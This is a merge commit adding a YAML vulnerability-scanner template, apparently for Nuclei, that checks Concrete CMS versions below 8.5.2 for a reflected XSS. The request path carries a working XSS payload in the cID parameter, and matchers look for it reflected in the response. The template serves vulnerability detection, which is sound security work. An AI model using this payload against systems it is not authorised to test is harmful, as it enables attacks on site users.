Merge pull request #1413 from projectdiscovery/concrete-xss

Adding concrete-xss

vulnerabilities/other/concrete-xss.yaml

@@ -0,0 +1,33 @@
+id: concrete-xss
+
+info:
+  author: shifacyclewla,hackergautam
+  description: The Concrete CMS < 8.5.2 is vulnerable to Reflected XSS using cID parameter.
+  name: Unauthenticated reflected XSS in preview_as_user function
+  severity: medium
+  tags: concrete,xss,cms
+  reference: |
+      - https://hackerone.com/reports/643442
+      - https://github.com/concrete5/concrete5/pull/7999
+      - https://twitter.com/JacksonHHax/status/1389222207805661187
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/ccm/system/panels/page/preview_as_user/preview?cID="></iframe><svg/onload=alert("{{randstr}}")>'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '</iframe><svg/onload=alert("{{randstr}}")>'
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200